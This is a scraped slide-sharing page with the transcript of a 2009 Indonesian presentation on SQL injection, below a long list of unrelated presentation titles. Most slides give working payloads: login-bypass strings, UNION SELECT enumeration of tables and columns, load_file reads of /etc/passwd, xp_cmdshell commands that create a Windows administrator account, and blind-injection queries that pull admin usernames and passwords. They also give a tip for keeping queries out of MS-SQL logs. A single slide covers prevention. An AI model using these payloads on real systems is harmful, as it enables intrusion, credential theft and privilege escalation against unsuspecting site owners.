27 maret 2009 by : nazRuL [at] delaforta.net.

Slides:



Advertisements
Presentasi serupa
SQL – DML.
Advertisements

PHP + MySQL.
Sejarah (1) • Tahun 1974, Dr. Chamberlin dari Saan Jose Laboratorium IBM mendefinisikan sebuah bahasa untuk mengakses database yang disebut dengan SEQUEL.
Widhy Hayuhardhika NP, S.Kom.  PHP – MySql installed  MySql telah running (cek xampp control panel)  Database  Tabel  Query  SQL (Structured Query.
Pertemuan 2 : Dasar-dasar SQL SBD C – Senin, Frank & Rudy
Pemrograman WEB Pertemuan 6
PERINTAH SQL.
Menggunaka n alter dan perintah DML PEMROGRMAN WEB 1 Asfan Muqtadir, S.Kom.
MYSQL.
Database Create-Retrieve-Update-Delete (CRUD)
SQL Basis Data.
SISTEM BASISDATA Lasmedi Afuan, ST.,M.Cs. SQL (S RUCTURE Q UERY L ANGUAGE ) Query/SQL : Bahasa standar yang digunakan untuk mengakses basisdata. Standar.
Oleh : Kholid Fathoni, S.Kom., M.T.
MEMBUAT HALAMAN LOGIN dan PENGGUNAAN SESSION
CHANGE DATA CAPTURE.
SQL 1 KTI by dna.  Merupakan bahasa query standar yang digunakan untuk mengakses basis data relasional  Jenis SQL yaitu 1. interactive  langsung dapat.
Pemrograman Visual II Database Management System (DBMS) Oleh: Erna Sri Hartatik, S.Kom
Pemrograman Web/MI/D3 sks
TRIGGER.
Microsoft SQL Server DDL dan DML dasar
Fungsi Agregat fungsi yang mengambil suatu kumpulan nilai-nilai sebagai input dan mengembalikan satu nilai sebagai output Select fungsi agregat SUM/AVG/MIN/MAX/COUNT.
Data Definition Language dan Data Manipulation Language
METOD POST (FILE PENGIRIM)
PRAKTIKUM 3 PEMROGRAMAN BASIS DATA. Menghapus baris  Deleting rows- DELETE FROM Use the DELELE FROM command to delete row(s) from a table, with the following.
Antonius Wahyu Sudrajat, S. Kom., M.T.I. Perintah SQL: Data Definition.
Data Types Data Definition Language Referential Constraint SQL Query
SQL = Structure Query Language
SQL (Structure Query Language)
Koneksi PHP ke Database MySQL
BAHASA QUERY TERAPAN OLEH : HARSITI, ST.
Mengelola Security Database
Sistem Basis Data Pertemuan 11 Presented by :
MANAJEMEN BASIS DATA Pertemuan 8 SUBQUERY.
STRUCTURED QUERY LANGUAGE (SQL)
Data Manipulation Language
Data Manipulation Language Presented by : Herianto.
Dasar query basis data dengan SQLite
Modul SBD-2 …….. SQL Server
Pertemuan after UTS Structure Query Language (SQL)
Pengamanan Sistem Jaringan
Pemrograman internet ABU SALAM, M.KOM.
PEMASARAN BERBASIS WEB
FUNGSI-FUNGSI AKSES MySql
SQL.
Konsep Teknologi Informasi B
SQL (Structure Query Language)
Manajemen Basis Data menggunakan SQL Server
Konsep Teknologi Informasi B
SQL (Structured Query Language)
PEMASARAN BERBASIS WEB
Stucture Query Language
Stucture Query Language
SQL OVERVIEW.
Structured Query Language (SQL)
Pengenalan MySQL An’ Anqinudin L.
Pengembangan Web Ramos Somya, S.Kom., M.Cs.
Structured Query Language
Data Manipulation Language (DML)
SQL.... Kependekan dari Structured Query Language.
Aplikasi Database Dosen : Sarwo, Skom,.Mkom Url :
Pemrograman Berorientasi Platform (IN315B) Ramos Somya, S.Kom., M.Cs.
Konsep dasar sistem basis data By K’ ILO ^_^
Stucture Query Language
HAIRUL ANUAR BIN HJ. MASROL
Referensi Bahasa MySQL
Stucture Query Language
MEMBANGUN DATABASE DENGAN MySQL
SQL dan Database MySQL.
BAHASA BASIS DATA Data Manipulation Languange
Pengantar Teknologi SIM 2 (pertemuan 7)
Transcript presentasi:

27 maret 2009 by : nazRuL [at] delaforta.net

Introduction SQL INJECTION SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

Simple Concept ‘ or 1=1-- ‘or ‘’ = ‘ ' or 1=1# ') or '1'='1-- admin'/* etc.....

MySQL Injection Input yang tak tervalidasi Penambahan tanda petik (‘) Pengujian dengan Query “AND”

INJECTION... CARI JUMLAH TABEL => ORDER BY CARI LETAK KOLOM => UNION SELECT CARI NAMA TABLE > information.schema > limit > group_concat

INJECTION (Continue...) * Let’s Get the XxX.. CARI NAMA KOLOM > information.schema > ‘table_name ‘ == hexa_string > limit > group_concat * Let’s Get the XxX..

THE SECRET DIBALIK table information .schema

Adavanced... * Magic Query .:. load_file(‘/path/file’); ex : /etc/passwd .:. into dumpfile (‘/path/fle’); Ex : /tmp/blabla > perm 777 /path/yang/diketahui/

MS-SQL Injection Input yang tak tervalidasi Penambahan tanda petik (‘) Pengujian dengan Query “AND”

INJECTION... Mencari nama-nama tabel => having 1=1-- (memanfaatkan error Query SQL) Memanfaatkan query “group by” => (group by table,table having 1=1--)

INJECTION... DATA MANIPULATION * UPDATE (update table_name set column2 where column1=n) * INSERT (insert into table_name values(n,’isi’) * DROP (drop table table_name) * SHUTDOWN

Adavanced... * Magic Query .:. Check status user convert(int,(select+user));-- .:. CMD SheLL queryf - * exec+master..xp_cmdshell ‘net user uname pass /add’ * exec+master..xp_cmdshell ‘net localgroup administartor uname /add’

Pencegahan - PHP based - ASP based Convert all to Int ‘Magic’ quotes Off <strip_tags> addslashes function - ASP based Replace ‘ to “ SQL Error Handling

Blind-SQL Injection Pengertian....

Blind-SQL => WHERE+table_name+NOT+IN+(‘table_yg_muncul’) # Pencarian table_admin, username ataupun passowrd # UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES => WHERE+table_name+NOT+IN+(‘table_yg_muncul’) UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=‘table_yg_diinginkan‘ => WHERE+table_name='user'+AND+ column_name+NOT+ IN+(‘column_yg_muncul’) UNION+SELECT+1,2,user,pass,4+FROM+table_admin

# Tips # Mengunakan Concatenation “untuk menampilkan field dengan banyak column_name” ID+’:’+username+’:’+userpass  ( ID%2B':'%2Busername%2B':'%2Buserpass ) # Menggunakan --sp_password “sp_password berfungsi agar mssql tidak melakukan logs query pada mssql ( kemungkinan hanya terlog pada server) > sering di temui pada web aplication: asp,cfm,aspx, etc..